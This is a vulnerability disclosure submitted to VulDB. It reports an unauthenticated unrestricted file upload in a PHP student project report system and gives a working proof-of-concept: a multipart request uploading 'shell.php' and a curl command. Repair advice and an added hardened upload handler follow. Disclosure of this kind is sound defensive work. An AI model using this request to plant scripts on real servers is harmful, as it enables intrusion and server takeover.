| Title | 1000projects.org Online Student Project Report Submission and Evaluation System PHP Project v1.0 File unrestricted upload |
|---|---|
| Description | # 1000projects.org Online Student Project Report Submission and Evaluation System PHP Project V1.0 /rse/admin/controller/student_controller.php File unrestricted upload
# NAME OF AFFECTED PRODUCT(S)
- Online Student Project Report Submission and Evaluation System PHP Project
## Vendor Homepage
- 1000projects.org
# AFFECTED AND/OR FIXED VERSION(S)
## Submitter
- USTC-l1nk
## Vulnerable File
- /rse/admin/controller/student_controller.php
## VERSION(S)
- V1.0
## Software Link
- https://1000projects.org/online-student-project-report-submission-and-evaluation-system-php-project.html#google_vignette
# PROBLEM TYPE
## Vulnerability Type
- File unrestricted upload
## Root Cause
- An unrestricted file upload vulnerability was found in the '/rse/admin/controller/student_controller.php' file of the 'Online Student Project Report Submission and Evaluation System PHP Project'. The cause is that the upload field (`new_image` in the request shown below) is accepted without proper verification of file type, size, content, or storage path, so attackers can upload arbitrary files (including malicious scripts), execute them on the server, and perform unauthorized operations.
## Impact
- Attackers can exploit this unrestricted file upload vulnerability to upload malicious scripts (such as PHP, JSP or ASP files), gain control of the server, access or tamper with sensitive data, spread malware, and even take the service down, posing a severe threat to system security and data confidentiality.
# DESCRIPTION
- During the security review of "Online Student Project Report Submission and Evaluation System PHP Project", I discovered a critical file unrestricted upload vulnerability in the "/rse/admin/controller/student_controller.php" file. This vulnerability arises from inadequate validation and restrictions on the parameter when handling file uploads, enabling attackers to upload arbitrary files. As a result, attackers can execute malicious code on the server, gain unauthorized access to the system, and compromise data security. Immediate remedial measures are required to ensure system security and protect data integrity.
# No login or authorization is required to exploit this vulnerability
# Vulnerability details and POC
## Vulnerability location:
- /rse/admin/controller/student_controller.php
## Payload:
```http
-----------------------------359889067940327199481066932168
Content-Disposition: form-data; name="id"

1
-----------------------------359889067940327199481066932168
Content-Disposition: form-data; name="old_image"

17.jpg
-----------------------------359889067940327199481066932168
Content-Disposition: form-data; name="name"

Razil
-----------------------------359889067940327199481066932168
Content-Disposition: form-data; name="phone"

9685748596
-----------------------------359889067940327199481066932168
Content-Disposition: form-data; name="regno"

151774
-----------------------------359889067940327199481066932168
Content-Disposition: form-data; name="dob"

2019-04-02
-----------------------------359889067940327199481066932168
Content-Disposition: form-data; name="gender"

male
-----------------------------359889067940327199481066932168
Content-Disposition: form-data; name="dept"

CS
-----------------------------359889067940327199481066932168
Content-Disposition: form-data; name="year"

2019
-----------------------------359889067940327199481066932168
Content-Disposition: form-data; name="email"

[email protected]
-----------------------------359889067940327199481066932168
Content-Disposition: form-data; name="new_image"; filename="shell.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------359889067940327199481066932168
Content-Disposition: form-data; name="address"

mangalore
-----------------------------359889067940327199481066932168
Content-Disposition: form-data; name="update"

Add
-----------------------------359889067940327199481066932168--
```
## The following are screenshots of some specific information obtained from testing file uploads:
```bash
curl -X POST -F "[email protected]" http://x.x.x.x/rse/admin/controller/student_controller.php
```
![Image](https://github.com/user-attachments/assets/f7d8d55c-3b91-4b53-9656-4ceba6dc941a)
![Image](https://github.com/user-attachments/assets/8a0bb02a-3497-4153-aaa7-4fbc86461e18)
# Suggested repair
1. **Strict file type verification:**
Verify the file type through MIME type checking, file extension whitelisting, and even file content inspection to ensure only allowed file types (such as images like .jpg, .png) can be uploaded.
2. **Set file size limits:**
Restrict the size of uploaded files to prevent large files from consuming server resources or being used for malicious purposes.
3. **Store files outside the web root directory:**
Save uploaded files in a directory that is not directly accessible via the web, and use a script to read and deliver files when needed, avoiding direct execution of uploaded files.
4. **Rename uploaded files:**
Generate a unique random name for each uploaded file instead of using the original filename, which can prevent path traversal attacks and ensure file uniqueness.
5. **Regular security audits:**
Regularly check the file upload function and related code to identify and fix potential security loopholes in a timely manner. |
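As an added example (not code from the 1000projects project or the reporter), the following PHP handler implements repair steps 1 to 4 above for the `new_image` upload field shown in the PoC request. It assumes a storage directory outside the web root (`UPLOAD_DIR`) and that the controller passes it `$_FILES['new_image']`; both are assumptions, not project code.

```php
<?php
// Added example: hardened replacement for the student image upload.
// Assumption: UPLOAD_DIR is outside the web root and is writable by PHP only.
declare(strict_types=1);

const UPLOAD_DIR = '/var/app-data/student_images';   // assumed path, not under the web root
const MAX_BYTES  = 2 * 1024 * 1024;                   // step 2: 2 MiB size limit
const ALLOWED    = ['image/jpeg' => 'jpg', 'image/png' => 'png']; // step 1: allowlist by sniffed type

/**
 * Validate an uploaded image and move it to UPLOAD_DIR under a random name.
 * Returns the stored filename, or throws RuntimeException on any rejection.
 */
function storeStudentImage(array $file): string
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed or missing');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    // Sniff the real content type; the client-supplied filename ("shell.php")
    // and Content-Type header ("application/octet-stream") are never trusted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime === false || !isset(ALLOWED[$mime])) {
        throw new RuntimeException('disallowed file type');
    }
    // Second content check: the decoder must agree that this is an image.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a valid image');
    }
    // Step 4: server-chosen random name with the extension derived from the
    // sniffed type, so any name or "../" the client sent is ignored.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    $dest = UPLOAD_DIR . DIRECTORY_SEPARATOR . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {   // step 3: outside web root
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640);   // stored file is never executable
    return $name;
}

// Hypothetical call site in the controller:
// try { $stored = storeStudentImage($_FILES['new_image']); }
// catch (RuntimeException $e) { http_response_code(400); exit('upload rejected'); }
```

Because the file lives outside the web root, a separate read-only script (not shown) must stream it back by its stored name; the PoC's `shell.php` is rejected at the `finfo` check before it is ever written.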
| Source | https://github.com/lan041221/cvec/issues/23 |
| User | USTC-l1nk (UID 88925) |
| Submission | 03/09/2025 18:03 (7 months ago) |
| Moderated | 14/09/2025 08:37 (11 days later) |
| Status | Duplicate |
| VulDB Entry | 323859 [1000projects Online Student Project Report Submission and Evaluation System student_controller.php privilege escalation] |
| Points | 0 |